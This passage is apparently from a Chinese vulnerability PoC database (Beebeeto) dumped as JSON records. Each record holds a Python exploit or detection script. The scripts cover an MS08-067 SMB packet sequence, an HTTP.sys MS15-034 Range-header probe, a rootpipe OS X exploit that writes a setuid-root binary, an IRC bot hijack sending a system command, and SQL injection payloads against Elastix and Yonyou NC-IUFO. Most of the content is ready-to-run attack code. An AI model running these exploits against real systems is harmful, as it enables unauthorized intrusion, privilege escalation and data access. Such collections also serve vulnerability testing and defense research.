Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n \u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n \u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n -----\r\n This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\n This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\n prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\n handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This\r\n is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\n development.\r\n ''',\r\n 'references': ['https://labs.portcullis.co.uk/tools/ms08-067-check/',\r\n 'https://technet.microsoft.com/en-us/library/security/ms08-067.aspx'],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type=int, default=445,\r\n help='request port.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n port = args['options']['port']\r\n payload = [\r\n ('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220'\r\n '0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00').decode('hex'),\r\n ('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0'\r\n '0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034'\r\n 'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000'\r\n '000000000000000000000000000556e69780053616d626100').decode('hex'),\r\n ('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0'\r\n '0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353'\r\n '50000300000000000000480000000000000048000000000000004000000000000000400000000'\r\n '8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100').decode('hex'),\r\n '00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'.decode('hex'),\r\n ('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0'\r\n '00000000800160000000000000003000000000000000000000080000000010000000100000040'\r\n '000000020000000009005c62726f7773657200').decode('hex'),\r\n ('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n '048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c'\r\n '0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701'\r\n '6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000').decode('hex'),\r\n ('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000'\r\n '074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c'\r\n '00050000031000000074000000010000000000000000002000000002000100000000000000010'\r\n '000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00'\r\n '46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000').decode('hex'),\r\n ]\r\n\r\n def setuserid(userid,data):\r\n return data[:32]+userid+data[34:]\r\n def settreeid(treeid,data):\r\n return data[:28]+treeid+data[30:]\r\n def setfid(fid,data):\r\n return data[:67]+fid+data[69:]\r\n if args['options']['verbose']:\r\n print '[*] Connect {}:{}'.format(ip,port)\r\n s = socket.socket()\r\n s.connect((ip,port))\r\n s.send(payload[0])\r\n s.recv(1024)\r\n s.send(payload[1])\r\n data = s.recv(1024)\r\n userid = data[32:34]\r\n s.send(setuserid(userid,payload[2]))\r\n s.recv(1024)\r\n data = setuserid(userid,payload[3])\r\n path = '\\\\\\\\%s\\\\IPC$\\x00' % ip\r\n path = path + (26-len(path))*'\\x3f'+'\\x00'\r\n data = data + path\r\n s.send(data)\r\n data = s.recv(1024)\r\n tid = data[28:30]\r\n s.send(settreeid(tid,setuserid(userid,payload[4])))\r\n data = s.recv(1024)\r\n fid = data[42:44]\r\n s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[5]))))\r\n s.recv(1024)\r\n s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[6]))))\r\n data = s.recv(1024)\r\n if data[9:13]=='\\x00'*4:\r\n print \"[+] Looks Vulnerability!\"\r\n args['success'] = True\r\n args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port)\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u201d\uff0c\u5982\u679c\u7528\u6237\u5728\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u4e0a\u6536\u5230\u7279\u5236\u7684 RPC\r\n\u8bf7\u6c42\uff0c\u5219\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002 \u5728 Microsoft Windows 2000\u3001Windows XP \u548c Windows Server 2003 \u7cfb\u7edf\u4e0a\uff0c\r\n\u653b\u51fb\u8005\u53ef\u80fd\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u5373\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u8fd0\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6b64\u6f0f\u6d1e\u53ef\u7528\u4e8e\u8fdb\u884c\u8815\u866b\u653b\u51fb\u3002\r\n-----\r\nThis module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service.\r\nThis module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to\r\nprevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to\r\nhandle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This\r\nis just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in\r\ndevelopment.", "app_name": "Windows", "id": "poc-2015-0085", "layer4_protocol": null}
{"create_date": "2015-04-15 16:31:02", "name": "IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 6, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "IIS\u6f0f\u6d1e,HTTP.sys\u6f0f\u6d1e,CVE-2015-1635,ms15-034", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport random\r\nimport urlparse\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0081',\r\n 'name': 'IIS HTTP.sys \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2015-1635) POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-04-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'IIS',\r\n 'vul_version': ['>7.0'],\r\n 'type': 'Code Execution',\r\n 'tag': ['IIS\u6f0f\u6d1e', 'HTTP.sys\u6f0f\u6d1e', 'CVE-2015-1635', 'ms15-034'],\r\n 'desc': '''\r\n \u5f71\u54cd\u8303\u56f4:\r\n Windows7\r\n Windows8\r\n Windows server 2008\r\n Windows server 2012\r\n \u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n \u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n \u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n \u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002\r\n ''',\r\n 'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',\r\n 'http://bobao.360.cn/news/detail/1435.html'],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type=int, default=80,\r\n help='request port.')\r\n self.user_parser.add_option('--timeout',\r\n action='store', dest='timeout', type=int, default=5,\r\n help='request timeout.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = args['options']['target']\r\n port = args['options']['port']\r\n timeout = args['options']['timeout']\r\n if urlparse.urlparse(target).netloc == '':\r\n target = urlparse.urlparse(target).path\r\n else:\r\n target = socket.gethostbyname(urlparse.urlparse(target).netloc)\r\n \r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',\r\n }\r\n \r\n if port == 443:\r\n url = 'https://%s:%d' % (target, port)\r\n else:\r\n url = 'http://%s:%d' % (target, port)\r\n r = requests.get(url, verify=False, headers=headers, timeout=timeout)\r\n if not r.headers.get('server') or \"Microsoft\" not in r.headers.get('server'):\r\n args['poc_ret']['error'] = '[-] Not IIS'\r\n return args\r\n\r\n hexAllFfff = '18446744073709551615'\r\n headers.update({\r\n 'Host': 'stuff',\r\n 'Range': 'bytes=0-' + hexAllFfff,\r\n })\r\n r = requests.get(url, verify=False, headers=headers, timeout=timeout)\r\n if \"Requested Range Not Satisfiable\" in r.content:\r\n print \"[+] Looks Vulnerability!\"\r\n args['success'] = True\r\n args['poc_ret']['vulnerability'] = '%s:%d' % (target, port)\r\n elif \"The request has an invalid header name\" in r.content:\r\n args['poc_ret']['error'] = \"[-] Looks Patched\"\r\n else:\r\n args['poc_ret']['error'] = \"[-] Unexpected response, cannot discern patch status\"\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u5f71\u54cd\u8303\u56f4:\r\n Windows7\r\n Windows8\r\n Windows server 2008\r\n Windows server 2012\r\n\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n\u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n\u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0081", "layer4_protocol": null}
{"create_date": "2015-04-10 11:45:23", "name": "Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Mac OS X \u63d0\u6743\u6f0f\u6d1e,Mac OS X rootpipe Local Privilege Escalation Vulnerability,CVE-2015-1130", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport objc\r\nimport ctypes\r\nimport platform\r\n\r\nfrom Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions\r\nfrom Foundation import NSAutoreleasePool\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0079',\r\n 'name': 'Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit',\r\n 'author': 'Emil Kvarnhammar',\r\n 'create_date': '2015-04-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'local',\r\n 'port': [0],\r\n 'layer4_protocol': [],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Mac OS X',\r\n 'vul_version': ['10.7.5', '10.8.2', '10.9.5', '10.10.2'],\r\n 'type': 'Other',\r\n 'tag': ['Mac OS X \u63d0\u6743\u6f0f\u6d1e', 'Mac OS X rootpipe Local Privilege Escalation Vulnerability',\r\n 'CVE-2015-1130',],\r\n 'desc': '''\r\n PoC exploit code for rootpipe (CVE-2015-1130)\r\n Created by Emil Kvarnhammar, TrueSec\r\n Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n # Usage: python exploit.py -t bashtest -d bashroot\r\n ''',\r\n 'references': [\r\n 'http://www.exploit-db.com/exploits/36692/',\r\n 'http://drops.wooyun.org/tips/5566',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-d','--dest_binary',\r\n action='store', dest='dest_binary', type='string', default=None,\r\n help='dest_binary')\r\n\r\n\r\n @staticmethod\r\n def load_lib(append_path):\r\n return ctypes.cdll.LoadLibrary(\"/System/Library/PrivateFrameworks/\" + append_path);\r\n\r\n @staticmethod\r\n def use_old_api():\r\n return re.match(\"^(10.7|10.8)(.\\d)?$\", platform.mac_ver()[0])\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n source_binary = args['options']['target']\r\n dest_binary = os.path.realpath(args['options']['dest_binary'])\r\n\r\n if not os.path.exists(source_binary):\r\n raise Exception(\"file does not exist!\")\r\n\r\n pool = NSAutoreleasePool.alloc().init()\r\n\r\n attr = NSMutableDictionary.alloc().init()\r\n attr.setValue_forKey_(04777, NSFilePosixPermissions)\r\n data = NSData.alloc().initWithContentsOfFile_(source_binary)\r\n\r\n print \"[*] will write file\", dest_binary\r\n\r\n if cls.use_old_api():\r\n adm_lib = cls.load_lib(\"/Admin.framework/Admin\")\r\n Authenticator = objc.lookUpClass(\"Authenticator\")\r\n ToolLiaison = objc.lookUpClass(\"ToolLiaison\")\r\n SFAuthorization = objc.lookUpClass(\"SFAuthorization\")\r\n\r\n authent = Authenticator.sharedAuthenticator()\r\n authref = SFAuthorization.authorization()\r\n\r\n # authref with value nil is not accepted on OS X <= 10.8\r\n authent.authenticateUsingAuthorizationSync_(authref)\r\n st = ToolLiaison.sharedToolLiaison()\r\n tool = st.tool()\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr)\r\n else:\r\n adm_lib = cls.load_lib(\"/SystemAdministration.framework/SystemAdministration\")\r\n WriteConfigClient = objc.lookUpClass(\"WriteConfigClient\")\r\n client = WriteConfigClient.sharedClient()\r\n client.authenticateUsingAuthorizationSync_(None)\r\n tool = client.remoteProxy()\r\n\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)\r\n\r\n print \"[+] Done!\"\r\n del pool\r\n args['success'] = True\r\n args['poc_ret']['dest_binary'] = dest_binary\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PoC exploit code for rootpipe (CVE-2015-1130)\r\nCreated by Emil Kvarnhammar, TrueSec\r\nTested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n# Usage: python exploit.py -t bashtest -d bashroot", "app_name": "Mac OS", "id": "poc-2015-0079", "layer4_protocol": null}
{"create_date": "2015-04-07 10:25:59", "name": "w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e,w3tw0rk / Pitbull Perl IRC Bot Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0077',\r\n 'name': 'w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-04-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [6667],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'w3tw0rk / Pitbull Perl IRC',\r\n 'vul_version': ['*'],\r\n 'type': 'Code Execution',\r\n 'tag': ['w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e', 'w3tw0rk / Pitbull Perl IRC Bot Vulnerability'],\r\n 'desc': '''\r\n pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\n that takes over the owner of a bot which then allows Remote Code Execution.\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36652/',\r\n ],\r\n },\r\n }\r\n\r\n def _init_user_parser(self): # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n self.user_parser.add_option('-c','--channel',\r\n action='store', dest='channel', type='string', default=None,\r\n help='IRC channel')\r\n self.user_parser.add_option('-n','--nick',\r\n action='store', dest='nick', type='string', default='beebeeto',\r\n help='IRC nick')\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n #irc server connection settings\r\n server = args['options']['target'] # IRC Server\r\n botnick = args['options']['nick'] # admin payload for taking over the w3wt0rk bot\r\n channel = \"#%s\"%args['options']['channel'] #channel where the bot is located\r\n\r\n irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket\r\n print \"connecting to: \" + server\r\n irc.connect((server, 6667)) #connects to the server\r\n irc.send(\"USER \"+ botnick +\" \"+ botnick +\" \"+ botnick +\" :I eat w3tw0rk bots!\\n\") #user authentication\r\n irc.send(\"NICK \"+ botnick +\"\\n\") #sets nick\r\n irc.send(\"JOIN \"+ channel +\"\\n\") #join the chan\r\n irc.send(\"PRIVMSG \"+channel+\" :!bot @system 'uname -a' \\n\") #send the payload to the bot\r\n\r\n #puts it in a loop\r\n while True:\r\n text = irc.recv(2040)\r\n print text #print text to console\r\n if text.find('PING') != -1: #check if 'PING' is found\r\n irc.send('PONG ' + text.split() [1] + '\\r\\n') #returnes 'PONG' back to the server (prevents pinging out!)\r\n if text.find('!quit') != -1: #quit the Bot\r\n irc.send (\"QUIT\\r\\n\") \r\n return args\r\n if text.find('Linux') != -1: \r\n irc.send(\"PRIVMSG \"+channel+\" :The bot answers to \"+botnick+\" which allows command execution \\r\\n\")\r\n irc.send (\"QUIT\\r\\n\")\r\n args['success'] = True\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\nthat takes over the owner of a bot which then allows Remote Code Execution.", "app_name": "Other", "id": "poc-2015-0077", "layer4_protocol": null}
{"create_date": "2015-04-06 16:28:12", "name": "Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Elastix\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/iridium_threed.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0076',\r\n 'name': 'Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Elastix',\r\n 'vul_version': ['2.x'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Elastix\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/iridium_threed.php', 'php'],\r\n 'desc': '''\r\n Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/36305/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/a2billing/customer/iridium_threed.php'\r\n payload = '?transactionID=-1 and 1=benchmark(2000000,md5(1))'\r\n start_time = time.time()\r\n if args['options']['verbose']:\r\n print '[+] Requset:' + verify_url\r\n print '[+] Payload:' + payload\r\n req = requests.get(verify_url + payload)\r\n if req.status_code == 200 and time.time() - start_time > 5:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url + paylaod\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"", "app_name": "Other", "id": "poc-2015-0076", "layer4_protocol": null}
{"create_date": "2015-04-01 14:13:19", "name": "\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u7528\u53cbNC-IUFO\u6f0f\u6d1e,/epp/detail/publishinfodetail.jsp,SQL Injection,JSP", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0075',\r\n 'name': '\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'ca2fux1n',\r\n 'create_date': '2015-03-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u7528\u53cbNC-IUFO',\r\n 'vul_version': ['*'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u7528\u53cbNC-IUFO\u6f0f\u6d1e', '/epp/detail/publishinfodetail.jsp', 'SQL Injection', 'JSP'],\r\n 'desc': 'param `pk_message` is not filterd',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-089208'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n url = url if url[-1] != '/' else url[:-1]\r\n payload = (\"/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20\"\r\n \"AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||\"\r\n \"CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN\"\r\n \"%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)\"\r\n \"||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA\")\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: %s' % verify_url\r\n req = requests.get(verify_url)\r\n content = req.content\r\n if req.status_code == 500 and 'qczgq1qnoiq' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "param `pk_message` is not filterd", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0075", "layer4_protocol": null}
{"create_date": "2015-03-30 17:08:36", "name": "ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopBuilder\u6f0f\u6d1e,/?m=product&s=list&ptype,SQL Injection,ShopBuilder", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0074',\r\n 'name': 'ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 